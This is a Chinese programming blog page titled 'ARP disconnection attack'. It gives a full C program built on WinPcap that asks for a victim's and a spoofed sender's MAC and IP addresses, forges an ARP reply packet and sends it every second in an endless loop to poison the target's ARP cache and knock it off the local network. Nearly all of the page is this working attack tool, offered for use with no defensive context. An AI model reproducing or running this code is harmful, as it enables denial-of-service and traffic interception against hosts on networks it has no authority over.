Home C/C++ ARP断网攻击
/*

IDE:Code::Blocks

编译器:gcc

*/

 #include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <string.h>
#include <conio.h>
#include <pcap.h>

typedef struct DLC_Header
{
    unsigned char DesMAC[6];    //以太网目的地址
    unsigned char SrcMAC[6];    //以太网源地址
    unsigned short EtherType;   //帧类型
} DLCHEADER;

typedef struct ARP_Frame
{
    unsigned short HW_Type;       //硬件类型
    unsigned short Prot_Type;     //上层协议类型
    unsigned char HW_Addr_Len;    //MAC地址长度
    unsigned char Prot_Addr_Len;  //IP地址长度
    unsigned short Opcode;        //操作码

    unsigned char Send_HW_Addr[6]; //发送端MAC地址
    unsigned char Send_Prot_Addr[4];   //发送端IP地址
    unsigned char Targ_HW_Addr[6]; //目标MAC地址
    unsigned char Targ_Prot_Addr[4];   //目标IP地址
} ARPFRAME;

BOOL ChooseDev(char *devbuff,int buffsize)
{
    pcap_if_t *alldevs=NULL,*p=NULL;
    char errbuff[PCAP_ERRBUF_SIZE];
    int i,choose;

    memset(devbuff,NULL,buffsize);
    if(pcap_findalldevs(&alldevs,errbuff)==-1)
        return ERROR;

    for(p=alldevs,i=0; p; p=p->next)
    {
        if(p->name)
        {
            printf("%d.%s(%s)\n\n",++i,p->name,p->description);
        }
        else
        {
            printf("没有发现网卡。\n");
            return FALSE;
        }
    }
    do
    {
        printf("请选择一个网卡:");
        fflush(stdin);
    }
    while(scanf("%d",&choose)!=1 || choose<1 ||choose>i);
    for(p=alldevs,i=1; i!=choose; p=p->next,i++);
    strcat(devbuff,p->name);
    pcap_freealldevs(alldevs);

    return TRUE;
}

void Fill_ARPPACKET(char *ARPPacket,int packetsize)
{
    DLCHEADER *DLCHeader=(DLCHEADER *)ARPPacket;
    ARPFRAME *ARPFrame=(ARPFRAME *)(ARPPacket+sizeof(DLCHEADER));

    memset(ARPPacket,NULL,packetsize);

    printf("请输入目标MAC地址:");
    fflush(stdin);
    if(scanf("%2x-%2x-%2x-%2x-%2x-%2x",&DLCHeader->DesMAC[0],&DLCHeader->DesMAC[1],&DLCHeader->DesMAC[2],\
             &DLCHeader->DesMAC[3],&DLCHeader->DesMAC[4],&DLCHeader->DesMAC[5])!=6) exit(-1);
    memcpy(ARPFrame->Targ_HW_Addr,DLCHeader->DesMAC,sizeof(DLCHeader->DesMAC));


    printf("请输入源MAC地址:");
    fflush(stdin);
    if(scanf("%2x-%2x-%2x-%2x-%2x-%2x",&DLCHeader->SrcMAC[0],&DLCHeader->SrcMAC[1],&DLCHeader->SrcMAC[2],\
             &DLCHeader->SrcMAC[3],&DLCHeader->SrcMAC[4],&DLCHeader->SrcMAC[5])!=6) exit(-1);
    memcpy(ARPFrame->Send_HW_Addr,DLCHeader->SrcMAC,sizeof(DLCHeader->SrcMAC));

    printf("请输入源IP地址:");
    fflush(stdin);
    if(scanf("%d.%d.%d.%d",&ARPFrame->Send_Prot_Addr[0],&ARPFrame->Send_Prot_Addr[1],&ARPFrame->Send_Prot_Addr[2],\
             &ARPFrame->Send_Prot_Addr[3])!=4) exit(-1);

    printf("请输入目标IP地址:");
    fflush(stdin);
    if(scanf("%d.%d.%d.%d",&ARPFrame->Targ_Prot_Addr[0],&ARPFrame->Targ_Prot_Addr[1],&ARPFrame->Targ_Prot_Addr[2],\
             &ARPFrame->Targ_Prot_Addr[3])!=4) exit(-1);

    DLCHeader->EtherType=htons((unsigned short)0x0806);
    ARPFrame->HW_Addr_Len=(unsigned char)6;
    ARPFrame->Prot_Addr_Len=(unsigned char)4;
    ARPFrame->HW_Type=htons((unsigned short)1);
    ARPFrame->Opcode=htons((unsigned short)0x0002);   //01表示请求,02表示应答
    ARPFrame->Prot_Type=htons((unsigned short)0x0800);
}

BOOL SendARPPacket(char *devName,char *ARPPacket,int packetsize)
{
    pcap_t *hpcap;
    char errbuf[PCAP_ERRBUF_SIZE];
    int n=0;

    if((hpcap=pcap_open_live(devName,        // 设备名
                             65536,          // 指定要捕捉的数据包的部分,65536 保证所有在链路层上的包都能够被抓到
                             1,                 // 混杂模式
                             1000,              // 读数据的超时时间
                             errbuf          // 错误缓冲区
                            ))==NULL)
    {
        printf("打开网卡出错。\n");
        return ERROR;
    }
    while(TRUE)
    {
        if(pcap_sendpacket(hpcap,ARPPacket,packetsize)==0)
        {
            printf("\n已发送%d个ARP应答包。\r",++n);
        }
        else
        {
            printf("ARP应答包发送失败。\n");
        }
        Sleep(1000);
    }

    return TRUE;
}

int main(int argc,char *argv[])
{
    char ARPPacket[60];
    char devName[100];

    if(ChooseDev(devName,sizeof(devName))!=TRUE)
    {
        printf("获取网卡列表失败。\n");
        getch();
        return -1;
    }
    Fill_ARPPACKET(ARPPacket,sizeof(ARPPacket));      //填充数据包
    if(!SendARPPacket(devName,&ARPPacket,sizeof(ARPPacket)))  //发送数据包
    {
        printf("发送ARP包失败。\n");
        getch();
        return -1;
    }

    return 0;
}

打赏
0 comment

You may also like

Leave a Comment

*

code

error: Alert: Content is protected !!